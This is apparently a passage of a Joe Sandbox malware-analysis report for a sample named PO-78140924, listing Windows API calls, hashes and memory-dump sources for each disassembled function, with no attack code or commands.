                                                • Opcode ID: 2cb762c6ff91af797471a3103906975d63ae36781c5521efa26d2b4eaae727b7
                                                • Instruction ID: d67e3e3eec1b47e21646e446881d2c839d8ec2f5b384145d7c68697305eb34b7
                                                • Opcode Fuzzy Hash: 2cb762c6ff91af797471a3103906975d63ae36781c5521efa26d2b4eaae727b7
                                                • Instruction Fuzzy Hash: EA41B671604206AFDB74DB38DC52EBA77E8EF44310F2044BEE549DB292EE719D828711
                                                APIs
                                                • _memset.LIBCMT ref: 00072550
                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0007259B
                                                • IsMenu.USER32(00000000), ref: 000725BB
                                                • CreatePopupMenu.USER32 ref: 000725EF
                                                • GetMenuItemCount.USER32(000000FF), ref: 0007264D
                                                • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 0007267E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                 • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                • String ID: 0$2
                                                • API String ID: 3311875123-3793063076
                                                • Opcode ID: 188690e2fa2bcc5bb148213305d7e5851152f8ea7ad99f775719f67ccf1b3d45
                                                • Instruction ID: 96d689dc8565753075a56ff3d2977171f8d903d3f0db8076286e790813dd8c1e
                                                • Opcode Fuzzy Hash: 188690e2fa2bcc5bb148213305d7e5851152f8ea7ad99f775719f67ccf1b3d45
                                                • Instruction Fuzzy Hash: BE51BE70E0024AEFDF20CF68D888AADBBF5FF04318F14816EE85997291E7789944CB55
                                                APIs
                                                • StringFromGUID2.COMBASE(?,?,00000028), ref: 00088EDA
                                                  • Part of subcall function 000891F5: LoadLibraryA.KERNEL32(kernel32.dll,?,00088E09), ref: 00089203
                                                  • Part of subcall function 000891F5: GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00089215
                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?), ref: 00088E3D
                                                • FreeLibrary.KERNEL32(00000000,00000001,00000000), ref: 00088E71
                                                • SysFreeString.OLEAUT32(00000000), ref: 00088F85
                                                • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00088FEB
                                                • SysFreeString.OLEAUT32(?), ref: 00089015
                                                • StringFromGUID2.COMBASE(?,?,00000028), ref: 00089165
                                                • ProgIDFromCLSID.COMBASE(?,?), ref: 000891AF
                                                • CoTaskMemFree.COMBASE(?), ref: 000891CC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                 • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: FreeString$From$Library$AddressFileLoadModuleNamePathProcProgQueryTaskType
                                                • String ID:
                                                • API String ID: 1458262341-0
                                                • Opcode ID: 2911f69d9281f0b937d75c17808bdac219b3f0f5a2087531c4ca7525f789c3e6
                                                • Instruction ID: 4bbf1eb9a5e2a8b953768c49d3433bcbee75bddad067de65eb72d2e3a85c3f12
                                                • Opcode Fuzzy Hash: 2911f69d9281f0b937d75c17808bdac219b3f0f5a2087531c4ca7525f789c3e6
                                                • Instruction Fuzzy Hash: FFE12771A00109AFDF54EF94C888EAEB7B9FF49314F148099F945AB251DB31AE45CB50
                                                APIs
                                                  • Part of subcall function 00011B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00012036,?,00000000,?,?,?,?,000116CB,00000000,?), ref: 00011B9A
                                                • DestroyWindow.USER32(?), ref: 000120D3
                                                • KillTimer.USER32(-00000001,?,?,?,?,000116CB,00000000,?), ref: 0001216E
                                                • DestroyAcceleratorTable.USER32(00000000), ref: 0004BE26
                                                • DeleteObject.GDI32(00000000), ref: 0004BE9C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                • String ID:
                                                • API String ID: 2402799130-0
                                                • Opcode ID: 7a798ed2bab43c833e3dad87ceaf3853a4c2738273876718344e384403209a60
                                                • Instruction ID: cbe438965c1a8c6d7c367d84e55da71c816e6b105c9654167e5e4ac9c6f062e7
                                                • Opcode Fuzzy Hash: 7a798ed2bab43c833e3dad87ceaf3853a4c2738273876718344e384403209a60
                                                • Instruction Fuzzy Hash: F6618B30101B01DFEB36DF15DD48BA9B7F1FB94312F10852AEA4297961C779A8A1EB50
                                                APIs
                                                • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00098731
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: InvalidateRect
                                                • String ID:
                                                • API String ID: 634782764-0
                                                • Opcode ID: 9304d8eaeb28b86d3a017cef806e7b31a90073c930d3f321401a9079c4c878ae
                                                • Instruction ID: 4fb91a5e2db3ead785fb908b252336106325b8750ca7e36c99c04fbcb0f17758
                                                • Opcode Fuzzy Hash: 9304d8eaeb28b86d3a017cef806e7b31a90073c930d3f321401a9079c4c878ae
                                                • Instruction Fuzzy Hash: E0517470504204BAEF209B65CC85BAD7BA4EB07350F608516FA15EA3E1CF75E990EB61
                                                APIs
                                                • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0004C477
                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0004C499
                                                • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0004C4B1
                                                • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0004C4CF
                                                • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0004C4F0
                                                • DestroyCursor.USER32(00000000), ref: 0004C4FF
                                                • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0004C51C
                                                • DestroyCursor.USER32(?), ref: 0004C52B
                                                  • Part of subcall function 0009A4E1: DeleteObject.GDI32(00000000), ref: 0009A51A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: CursorDestroyExtractIconImageLoadMessageSend$DeleteObject
                                                • String ID:
                                                • API String ID: 2975913752-0
                                                • Opcode ID: 324697282c1494b5066f51f2424bb76e2fa1b76a3a624343ac5bfda4d540cccd
                                                • Instruction ID: 1ef97605083e9744fcc7ea8a5e9a120d0cfb4447bbbacb5def08c2d8facf6348
                                                • Opcode Fuzzy Hash: 324697282c1494b5066f51f2424bb76e2fa1b76a3a624343ac5bfda4d540cccd
                                                • Instruction Fuzzy Hash: E05167B4600609EFEB64DF24DC85FAE77E5EB58311F104529F902E72A0DB74ADA0DB60
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Variant$ClearInit$_memset
                                                • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                • API String ID: 2862541840-625585964
                                                • Opcode ID: 2c8c9b0fae0519a41af3f74d130108239159dd231b2c709553cc30652c297afd
                                                • Instruction ID: 2ba0b34257c8f4848352bce897fc7347410965b21ae28b5f44ef40ff2ad60847
                                                • Opcode Fuzzy Hash: 2c8c9b0fae0519a41af3f74d130108239159dd231b2c709553cc30652c297afd
                                                • Instruction Fuzzy Hash: 9891AD70A00219ABDF24FFA4C844FAEBBB8FF85710F148569F549AB281D7709945CBA0
                                                APIs
                                                • LoadIconW.USER32(00000000,00007F03), ref: 000730CD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: IconLoad
                                                • String ID: blank$info$question$stop$warning
                                                • API String ID: 2457776203-404129466
                                                • Opcode ID: cd2062c3cc21818539a20dd23174b9cf69437d8d57665949166347592742dfce
                                                • Instruction ID: 524cb2ec63807303a644dc6ad757d95e7cd13b4a327c14829363a8e66331db18
                                                • Opcode Fuzzy Hash: cd2062c3cc21818539a20dd23174b9cf69437d8d57665949166347592742dfce
                                                • Instruction Fuzzy Hash: DE11EB35A08707BAF7355B54DCA2DEF77DC9F05320F10802AF60896182DAB96F4057E9
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000100), ref: 00074353
                                                • LoadStringW.USER32(00000000), ref: 0007435A
                                                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00074370
                                                • LoadStringW.USER32(00000000), ref: 00074377
                                                • _wprintf.LIBCMT ref: 0007439D
                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 000743BB
                                                Strings
                                                • %s (%d) : ==> %s: %s %s, xrefs: 00074398
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: HandleLoadModuleString$Message_wprintf
                                                • String ID: %s (%d) : ==> %s: %s %s
                                                • API String ID: 3648134473-3128320259
                                                • Opcode ID: baaeb7ce3f5eb606658b21cac77ea20475c47525b67dd4beb9a7312168ce4ca9
                                                • Instruction ID: d89f8243a7fa3904c5d6e51fd0904c21fa23adbc4db2abae1acd17d90bc91678
                                                • Opcode Fuzzy Hash: baaeb7ce3f5eb606658b21cac77ea20475c47525b67dd4beb9a7312168ce4ca9
                                                • Instruction Fuzzy Hash: F80162F3904209BFE7519BA0DD89EFA776CE708301F0045A6B749E2051EA789E854B74
                                                APIs
                                                • InterlockedExchange.KERNEL32(?,?), ref: 000772EC
                                                • RtlEnterCriticalSection.NTDLL(?), ref: 000772FD
                                                • TerminateThread.KERNEL32(?,000001F6,?,0004D273), ref: 0007730A
                                                • WaitForSingleObject.KERNEL32(?,000003E8,?,0004D273), ref: 00077317
                                                  • Part of subcall function 00076CDE: CloseHandle.KERNEL32(?,?,00077324,?,0004D273), ref: 00076CE8
                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 0007732A
                                                • RtlLeaveCriticalSection.NTDLL(?), ref: 00077331
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                • String ID: %
                                                • API String ID: 3495660284-3960974693
                                                • Opcode ID: 76ada328c5a9f7cc6f8ed262365173b79c20647a2ae6423998b217541c99526d
                                                • Instruction ID: aebce293ace05a406b6a63e6c1e4ebf1ac1cdc22654ced290096146275a8c37e
                                                • Opcode Fuzzy Hash: 76ada328c5a9f7cc6f8ed262365173b79c20647a2ae6423998b217541c99526d
                                                • Instruction Fuzzy Hash: E3F05E36540613EBF7122B64ED8CAEA776AFF49302B100533F506D10A0CB7A6911CBA0
                                                APIs
                                                • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0004C347,00000004,00000000,00000000,00000000), ref: 00012ACF
                                                • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0004C347,00000004,00000000,00000000,00000000,000000FF), ref: 00012B17
                                                • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0004C347,00000004,00000000,00000000,00000000), ref: 0004C39A
                                                • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0004C347,00000004,00000000,00000000,00000000), ref: 0004C406
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: ShowWindow
                                                • String ID:
                                                • API String ID: 1268545403-0
                                                • Opcode ID: aa701ee1be9166f2dd9bd01e9b436dda86f2cd4f781ddc984e3983f2bc5c3f30
                                                • Instruction ID: be2450a72ef5c2fdd501cb619cad114c1f03757c7383320ce9cb5b6e6003fb54
                                                • Opcode Fuzzy Hash: aa701ee1be9166f2dd9bd01e9b436dda86f2cd4f781ddc984e3983f2bc5c3f30
                                                • Instruction Fuzzy Hash: DC4108702097809BE7B98F289CC8BFF7BD5BF45301F95882EE04786561C675A8E1D722
                                                APIs
                                                • DeleteObject.GDI32(00000000), ref: 0009621D
                                                • GetDC.USER32(00000000), ref: 00096225
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00096230
                                                • ReleaseDC.USER32(00000000,00000000), ref: 0009623C
                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,?,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00096278
                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00096289
                                                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 000962C3
                                                • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 000962E3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                • String ID:
                                                • API String ID: 3864802216-0
                                                • Opcode ID: 93a946243ba40ca85bfc3c3e6fa67e5e725045d28238c9b29313769939f1781f
                                                • Instruction ID: a33301c88559fad507c837295fc80eb0ed00b9f4a74ff61a8f7bd3851a668015
                                                • Opcode Fuzzy Hash: 93a946243ba40ca85bfc3c3e6fa67e5e725045d28238c9b29313769939f1781f
                                                • Instruction Fuzzy Hash: 31316D72201610BFEF118F50DC8AFFA3BA9FF49761F040066FE08DA191C67A9851CBA4
                                                APIs
                                                • __getptd_noexit.LIBCMT ref: 00035F1D
                                                  • Part of subcall function 00039B44: GetLastError.KERNEL32(00000000,?,00038CAD,00035913,00000000,?,000389B3,?,?,?,00000000,?,00039E55,00000018,000CA1A8,00000008), ref: 00039B46
                                                  • Part of subcall function 00039B44: __calloc_crt.LIBCMT ref: 00039B67
                                                  • Part of subcall function 00039B44: __initptd.LIBCMT ref: 00039B89
                                                  • Part of subcall function 00039B44: GetCurrentThreadId.KERNEL32 ref: 00039B90
                                                  • Part of subcall function 00039B44: SetLastError.KERNEL32(00000000,000389B3,?,?,?,00000000,?,00039E55,00000018,000CA1A8,00000008,00039DA2,?,?,?,0003339E), ref: 00039BA8
                                                • CloseHandle.KERNEL32(?,?,00035EFC), ref: 00035F31
                                                • __freeptd.LIBCMT ref: 00035F38
                                                • RtlExitUserThread.NTDLL(00000000,?,00035EFC), ref: 00035F40
                                                • GetLastError.KERNEL32(?,?,00035EFC), ref: 00035F70
                                                • RtlExitUserThread.NTDLL(00000000,?,?,00035EFC), ref: 00035F77
                                                • __freefls@4.LIBCMT ref: 00035F93
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: ErrorLastThread$ExitUser$CloseCurrentHandle__calloc_crt__freefls@4__freeptd__getptd_noexit__initptd
                                                • String ID:
                                                • API String ID: 3304096619-0
                                                • Opcode ID: 17dd3c6e2d9815e2c229ed7511996c5f8f6caf3255ed3a64b862b05b863a4de3
                                                • Instruction ID: 347b56e0538c98b73482483b691622614b921bed3ae61a60284c54d2fc5966d1
                                                • Opcode Fuzzy Hash: 17dd3c6e2d9815e2c229ed7511996c5f8f6caf3255ed3a64b862b05b863a4de3
                                                • Instruction Fuzzy Hash: 5C210B75404605AFDB267B78CC0669E77ECFF00711F108539F958C6262EB34DD81DA96
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                 • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 342720227cf0bfaa008f0ee0eeef25556d83227c945272d3530ce8d6bb492e4a
                                                • Instruction ID: dd7a2e6a6de790d27cd16feac680a197931f531212243d750837087fec56bac7
                                                • Opcode Fuzzy Hash: 342720227cf0bfaa008f0ee0eeef25556d83227c945272d3530ce8d6bb492e4a
                                                • Instruction Fuzzy Hash: ED716C70904109EFDB18CF98CC49AFEBBB9FF85310F148159FA15AB251C734AA91CBA4
                                                APIs
                                                • IsWindow.USER32(01463B38), ref: 0009B41F
                                                • IsWindowEnabled.USER32(01463B38), ref: 0009B42B
                                                • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 0009B50F
                                                • SendMessageW.USER32(01463B38,000000B0,?,?), ref: 0009B546
                                                • IsDlgButtonChecked.USER32(?,?), ref: 0009B583
                                                • GetWindowLongW.USER32(01463B38,000000EC), ref: 0009B5A5
                                                • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0009B5BD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                 • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                • String ID:
                                                • API String ID: 4072528602-0
                                                • Opcode ID: bf7248ffef6637dfd89e15aaa9a9bdf2732c3e334a883f7c3b0d8d01196ad6b8
                                                • Instruction ID: 0f6478741535877ba4fee06b848a41c6061e840d36f1c9999592e402d564d7ba
                                                • Opcode Fuzzy Hash: bf7248ffef6637dfd89e15aaa9a9bdf2732c3e334a883f7c3b0d8d01196ad6b8
                                                • Instruction Fuzzy Hash: 98718C34605604AFEF219F64ED94FBA7BE9FF09320F14406AF955972A2C731A950FB20
                                                APIs
                                                • GetConsoleMode.KERNEL32(?,?), ref: 0003DC3C
                                                • GetConsoleCP.KERNEL32 ref: 0003DC5A
                                                • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 0003DD99
                                                  • Part of subcall function 00038C74: __getptd_noexit.LIBCMT ref: 00038C74
                                                  • Part of subcall function 00038CA8: __getptd_noexit.LIBCMT ref: 00038CA8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
